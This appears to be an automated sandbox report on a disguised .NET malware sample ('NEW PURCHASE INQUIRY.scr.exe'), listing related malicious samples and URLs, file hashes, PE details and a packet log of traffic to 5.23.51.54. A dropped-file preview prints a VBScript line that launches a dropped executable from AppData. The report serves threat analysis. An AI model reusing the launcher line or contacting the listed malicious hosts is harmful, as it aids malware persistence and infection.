                                      • 5.23.51.54
                                      rPO49120.scr.exeGet hashmaliciousUnknownBrowse
                                      • 5.23.51.54
                                      rPO49120.scr.exeGet hashmaliciousUnknownBrowse
                                      • 5.23.51.54
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      TIMEWEB-ASRUhK8z1AmKO1.exeGet hashmaliciousDCRatBrowse
                                      • 185.114.245.123
                                      arm7.elfGet hashmaliciousMirai, MoobotBrowse
                                      • 91.210.168.189
                                      bot.sh4.elfGet hashmaliciousMiraiBrowse
                                      • 91.210.168.190
                                      LaRHzSijsq.exeGet hashmaliciousDCRatBrowse
                                      • 92.53.106.114
                                      jew.m68k.elfGet hashmaliciousUnknownBrowse
                                      • 176.57.212.213
                                      2.exeGet hashmaliciousUnknownBrowse
                                      • 92.53.116.138
                                      Order Ref SO14074.pdf.scr.exeGet hashmaliciousUnknownBrowse
                                      • 5.23.51.54
                                      rPO49120.scr.exeGet hashmaliciousUnknownBrowse
                                      • 5.23.51.54
                                      rPO49120.scr.exeGet hashmaliciousUnknownBrowse
                                      • 5.23.51.54
                                      DCRatBuild.exeGet hashmaliciousDCRatBrowse
                                      • 185.114.245.123
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      3b5074b1b5d032e5620f69f9f700ff0ehttps://redduppgh.com/Get hashmaliciousUnknownBrowse
                                      • 5.23.51.54
                                      https://minia.n1tab.com/Get hashmaliciousUnknownBrowse
                                      • 5.23.51.54
                                      http://topmarktingplace.com/4vfVEJ42616owhy1324yhmrkkdpck110EVYGTFUNAFUPGFT22589MFQQ17548D10Get hashmaliciousUnknownBrowse
                                      • 5.23.51.54
                                      http://topmarktingplace.com/4KCrhO42616HeLs1324axlafysauc110UGQLALGLNEZCHJM22589XDWY17548d10Get hashmaliciousUnknownBrowse
                                      • 5.23.51.54
                                      PO.exeGet hashmaliciousMassLogger RATBrowse
                                      • 5.23.51.54
                                      ZipThis.exeGet hashmaliciousUnknownBrowse
                                      • 5.23.51.54
                                      pTVKHqys2h.exeGet hashmaliciousXmrigBrowse
                                      • 5.23.51.54
                                      EZZGTmJj4O.exeGet hashmaliciousAgentTeslaBrowse
                                      • 5.23.51.54
                                      BgroUcYHpy.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      • 5.23.51.54
                                      No context
                                      Process:C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exe
                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):13312
                                      Entropy (8bit):4.801759854277208
                                      Encrypted:false
                                      SSDEEP:192:92+tkQisrmlm8/0H/Rq3dkpAfQZz/IJOP:92+CL6H/WdkpAIZz/I4
                                      MD5:A9BC0FAD0B1A1D6931321BB5286BF6B7
                                      SHA1:716972DE3A984B6B842AF2CEFDF324898179E6C2
                                      SHA-256:C211E844C192FE91AD5B3EC3B4288392D475797126DD0600EF4A4351D840B58F
                                      SHA-512:FAABDF00C8D0606FECAB73C13979233E55AF7B87CDC3F66B72E9690FC9D4F7DE959AF69F21AAE9D0427CFBB77A1FF9AE405499A862442AE3C646414C79CFD1F5
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 68%
                                      Reputation:low
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....}g....................."........... ...@....@.. ....................................`.....................................O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@... ..................@..@.reloc.......`.......2..............@..B........................H........!...............................................................(....*..(....*..0..X.......(....u.....o....(.....(.....o....o....X.>*........(.....r...po....rM..p(....(...+o....&*.0............8A....s....%o....ra..prw..po....%rX..ps....o....o.....o ........&......,.r...p(!....r...p(!....s"....s#..........o$....s%...........io&...s'...%..o(...o)......+.....9......o*......9......o*.....9.....o*......*..4......:B..........%.........n.F.........g.\.......BSJB............
                                      Process:C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:modified
                                      Size (bytes):26
                                      Entropy (8bit):3.95006375643621
                                      Encrypted:false
                                      SSDEEP:3:ggPYV:rPYV
                                      MD5:187F488E27DB4AF347237FE461A079AD
                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                      Malicious:true
                                      Reputation:high, very likely benign file
                                      Preview:[ZoneTransfer]....ZoneId=0
                                      Process:C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):83
                                      Entropy (8bit):4.712228967872892
                                      Encrypted:false
                                      SSDEEP:3:FER/n0eFHHoUkh4EaKC5vXRkinn:FER/lFHI9aZ5vXRJ
                                      MD5:3543920595153639BE1348012C14F072
                                      SHA1:69297A41B359F14631A709531790BB5D260F2FED
                                      SHA-256:8BEFBA1971346D62EE8CFCEE7F77AE14CCF03B90599E1768EDCC7F474301A380
                                      SHA-512:C5D3FF01E372DDC0B3C0C69A99A177F4DBB5A0CEA183F54865C63935CDAB581A09B985931E040ED7374AAE645ECBDDE9166A0E96EC02868E011367213D4DA423
                                      Malicious:true
                                      Reputation:low
                                      Preview:CreateObject("WScript.Shell").Run """C:\Users\user\AppData\Roaming\CharSet.exe"""
                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Entropy (8bit):4.801759854277208
                                      TrID:
                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                      • Win32 Executable (generic) a (10002005/4) 49.78%
                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                      • DOS Executable Generic (2002/1) 0.01%
                                      File name:NEW PURCHASE INQUIRY.scr.exe
                                      File size:13'312 bytes
                                      MD5:a9bc0fad0b1a1d6931321bb5286bf6b7
                                      SHA1:716972de3a984b6b842af2cefdf324898179e6c2
                                      SHA256:c211e844c192fe91ad5b3ec3b4288392d475797126dd0600ef4a4351d840b58f
                                      SHA512:faabdf00c8d0606fecab73c13979233e55af7b87cdc3f66b72e9690fc9d4f7de959af69f21aae9d0427cfbb77a1ff9ae405499a862442ae3c646414c79cfd1f5
                                      SSDEEP:192:92+tkQisrmlm8/0H/Rq3dkpAfQZz/IJOP:92+CL6H/WdkpAIZz/I4
                                      TLSH:6E521800F3A58726D8E45FF26EE6D3646370BB017503EB1F36C22A0F3DA43159626B55
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....}g....................."........... ...@....@.. ....................................`................................
                                      Icon Hash:70cccc8692968ec8
                                      Entrypoint:0x402efe
                                      Entrypoint Section:.text
                                      Digitally signed:false
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                      DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                      Time Stamp:0x677D96E6 [Tue Jan 7 21:04:38 2025 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:4
                                      OS Version Minor:0
                                      File Version Major:4
                                      File Version Minor:0
                                      Subsystem Version Major:4
                                      Subsystem Version Minor:0
                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                      Instruction
                                      jmp dword ptr [00402000h]
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      NameVirtual AddressVirtual Size Is in Section
                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x2eac0x4f.text
                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x40000x1f1a.rsrc
                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x60000xc.reloc
                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                      .text0x20000xf040x10005f8d10c5b097f6a2166901c69ecc9a63False0.55712890625data5.203621424324824IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                      .rsrc0x40000x1f1a0x20003636421c68306198cdf669176dd65118False0.3978271484375data4.664421997796066IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .reloc0x60000xc0x2009feb2365c1e66d7b627991f0e4ccd40dFalse0.041015625data0.06116285224115448IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                      RT_ICON0x41300x1870Device independent bitmap graphic, 35 x 84 x 32, image size 58800.4040920716112532
                                      RT_GROUP_ICON0x59a00x14data1.1
                                      RT_VERSION0x59b40x37cdata0.4024663677130045
                                      RT_MANIFEST0x5d300x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                      DLLImport
                                      mscoree.dll_CorExeMain
                                      TimestampSource PortDest PortSource IPDest IP
                                      Jan 9, 2025 08:19:00.625281096 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:00.625324965 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:00.625421047 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:00.642731905 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:00.642762899 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:01.364639044 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:01.364816904 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:01.379720926 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:01.379736900 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:01.380063057 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:01.427391052 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:01.493449926 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:01.539340973 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:01.841029882 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:01.841067076 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:01.841075897 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:01.841084957 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:01.841118097 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:01.841136932 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:01.841162920 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:01.841181040 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:01.841211081 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:01.843924999 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:01.843941927 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:01.843980074 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:01.843988895 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:01.844027996 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:01.883714914 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:02.971925020 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:02.971941948 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:02.971980095 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:02.972043991 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:02.972078085 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:02.972099066 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:02.972126961 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:02.975517035 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:02.975536108 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:02.975614071 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:02.975629091 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:02.975675106 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:02.978527069 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:02.978543997 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:02.978610992 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:02.978619099 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:02.978667021 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:02.980910063 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:02.980927944 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:02.980989933 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:02.980998039 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:02.981040955 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.125745058 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.125777960 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.125947952 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.125988960 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.126053095 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.128784895 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.128803968 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.128882885 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.128891945 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.128962040 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.131203890 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.131228924 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.131303072 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.131318092 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.131378889 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.132987976 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.133003950 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.133073092 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.133081913 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.133157015 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.135690928 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.135709047 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.135778904 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.135787010 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.135829926 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.137495041 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.137511015 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.137572050 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.137579918 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.137624025 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.140105963 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.140120983 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.140214920 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.140223980 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.140273094 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.141879082 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.141894102 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.141959906 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.141968012 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.142009974 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.142810106 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.142827034 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.142895937 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.142903090 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.142945051 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.145400047 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.145416975 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.145481110 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.145489931 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.145533085 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.147123098 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.147144079 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.147200108 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.147207975 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.147252083 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.148088932 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.148109913 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.148173094 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.148186922 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.148231030 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.149933100 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.149949074 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.150007010 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.150013924 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.150060892 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.151659966 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.151681900 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.151740074 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.151747942 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.151793957 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.152664900 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.152682066 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.152746916 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.152754068 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.152796984 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.154500008 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.154542923 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.154608011 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.154614925 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.154655933 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.156147957 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.156164885 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.156227112 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.156234980 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.156285048 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.157022953 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.157038927 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.157088041 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.157094955 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.157166004 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.158798933 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.158816099 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.158875942 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.158884048 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.158970118 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.159733057 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.159749985 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.159807920 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.159815073 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.159858942 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.160996914 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.161012888 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.161072969 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.161081076 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.161123991 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.162007093 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.162022114 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.162081957 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.162087917 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.162132025 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.162975073 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.162991047 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.163048029 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.163055897 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.163100004 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.163986921 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.164001942 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.164062023 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.164069891 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.164113045 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.165340900 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.165357113 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.165416002 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.165424109 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.165469885 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.166241884 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.166259050 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.166310072 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.166317940 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.166366100 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.168019056 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.168045998 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.168096066 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.168104887 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.168145895 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.168884039 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.168900013 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.168966055 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.168973923 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.169028044 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.169363976 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.169379950 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.169437885 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.169445992 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.169487953 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.170327902 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.170344114 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.170402050 CET49704443192.168.2.55.23.51.54
